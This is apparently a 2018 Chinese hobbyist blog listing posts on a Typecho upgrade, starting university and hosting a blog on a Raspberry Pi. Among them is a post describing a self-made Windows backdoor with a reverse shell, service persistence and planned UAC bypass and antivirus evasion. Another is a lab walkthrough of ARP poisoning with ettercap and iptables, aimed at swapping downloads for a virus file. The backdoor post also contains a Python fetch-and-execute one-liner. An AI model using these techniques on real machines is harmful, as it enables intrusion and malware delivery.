更新了下typecho版本
旧版的typecho竟然不支持新版的php。。
以及我这个远古主题有些函数typecho竟然也不支持了
稍微暴力修改了下,还算能用吧。
要开学了,好忙呀
博客迁移完成
2018-08-28 | 随便写的什么奇怪的东西
开坑,自用工具包
2018-08-13 | 随便写的什么奇怪的东西
预计分为Win版和linux版本。
并没有什么卵用的工具包,也不一定是自己写的,也许是收集的。
什么时候完成我也不知道。反正目前就这样开着就是了。
exec(__import__('urllib').urlopen('').read())反弹式shell后门
<font color="red" size="10">未完成版</font>
别问我为啥要用红色加粗字体(我只是想试试在博客上的效果hhhh
闲着无聊弄得这个,并没有什么技术含量
其中远程匿名管道是直接调用cmd.exe的,个人推荐不这么做。
最低限度的话也得把cmd复制到其他路径,否则直接请求cmd进程是个很敏感的动作。

目前已完成
- 自动释放到%WINDIR%目录下
- 安装服务自启
- 提升进程权限
- 双向匿名管道反弹shell
目前未完成
- 入口点Main改成WinMain,隐藏第一次运行的命令行窗口
- 修改反弹连接方式,改为触发形连接,目前这套是过不了启发引擎和主动防御的
- 添加UAC,自动申请UAC权限/bypassUAC
- 使用之前的一篇文章进行绕过云查杀
代码在这:my.rar
我也是大学生辣!
2018-08-02 | 随便写的什么奇怪的东西
好久没写博客了,沉寂摸鱼了快半年,不,应该有一年了吧,高考也终于忙完辣。
志愿结果也出来了,差一分进入理想的大学,但是总体来说还算Ojbk吧_(:з)∠)_
Ero的话,目前还是不温不火,可能我的运维方式有点问题。目前也没什么办法,伤脑筋中。
接下来就有时间了,就正式成为大学生辣。不过感觉大一应该会很忙的样子。
首先专业课是不能落下的,还有军训什么的。虽然我想去学计算机专业然而我的考试方式注定让我只能去音乐学师范QAQ。
不过还好至少小姐姐多,而且都是富婆(
为了扩充咱的技术栈,我已经把咱的那本垃圾联想G50-30笔记本刷成了debian,开始正式投入学习啦。
以及入坑了瞎到暴死(Shadowverse),国际服的,有小伙伴一起玩吗?
顺带一提,我得试着在九月份之前解决博客问题。
目前博客是在树莓派上,而我即将离开我的家去进行宿舍生活了。虽说树莓派放在家里十天八天甚至几个月也不会出什么问题(因为我真的几个月没动过hhhh
但是如果出了问题就麻烦了,并没有人帮忙解决,所以现在只有三种选项
- 头铁放家里,如果炸了回家再修
- 托管服务器
- 扔到宿舍,宿舍有网。然后靠着frp苟活度日_(:з)∠)_
目前就这种方法,然而这三种方法都有弊端。
- 长远之计不可行,炸了那可不是炸一两天的结果了
- 好贵,好贵,好贵!
- 目前不知道宿舍状态_(:з)∠)_。不敢随便头铁
所以目前方式打算先丢Ero的服务器上将就下啦。
以及目前打算阅读的书籍:
- Windows PE权威指南
- linux系统编程
- Windows核心编程
图片可能会有失效
2018-07-07 | 随便写的什么奇怪的东西
只是连接出了点问题_(:з)∠)_
我不应该用相对路径的淦。
90多个文章又得修好烦啊QAQ
看情况修复吧。咕咕咕咕咕咕咕咕咕咕
Kali 下arp劫持并且修改数据包实现
2018-06-19 | 随便写的什么奇怪的东西,技术文章
最近不知道干啥又突然开始研究起这玩意了emmm。
同时想在修改数据包下自己操作实现,毕竟修改数据包可以复用,不只用于arp劫持,所以就开了这个坑啦。
研究过时技术inghhhhhh
使用设备:
- kali linux
- windwos XP SP2
使用工具
- ettercap
- msf/nbtscan(可选)
- wireshark
开始
第一阶段,自然就是利用kali自带的工具进行arp劫持啦,比如arpspoof,ettercap什么的。
这里我们选择用ettercap,毕竟有gui
首先使用NBTSCAN扫描内网内的主机,试图从文件名判断目标。
不过明显看不出来,之后我们可以使用msf使用smb探测主机信息。不过我已经知道目标地址了,所以这一步就跳过,直接显示目标信息
之后使用ettercap -G,
输入ifconfig查找网关,之后设置target1,target2。之后选择arp 投毒。
然后在目标机器上输入arp -a 和ipconfig检测投毒效果
之后在kali启动wireshare,嗅探监听网卡,并且设置ip源为目标机器
之后目标机器发送ping测试


投毒成功
第二阶段
嗅探本地监听到的数据,一旦有下载请求就自动替换为本地的病毒文件。
发现过于简单,并且网络上相关资源很多,有点想怠惰。。
自己写转发又感觉有点麻烦啊_(:з)∠)_
发现了linux下有个Route功能,可以不用自己写转发。emmm但是如何修改这是个问题,研究ing
[更新]
发现iptables+linux的路由转发可以过滤指定的包并且自动帮忙转发其他的包
这样就能省下许多工作量,然后本地网卡嗅探到这些被过滤的包再由我们进行转发就行了。这时候就能进行修改以及插入的动作而不是简单的读取了。
可以参考这篇:iptables转发技术
我们的目的是需要修改特定的数据包,一般是用作与80协议,所以我们可以直接拦截目的地址为目标主机,端口为80的地址
我们假设目标的IP地址为192.168.1.2,iptables的代码如下:
iptables -A PREROUTING -i eth0 -d 192.168.1.2 -j DROP
这时候,需要我们的PY登场,使用pcap监听互联网帧,并且过滤ip地址为192.168.1.2,接下来就是python的事情啦。咕咕咕中
等待更新。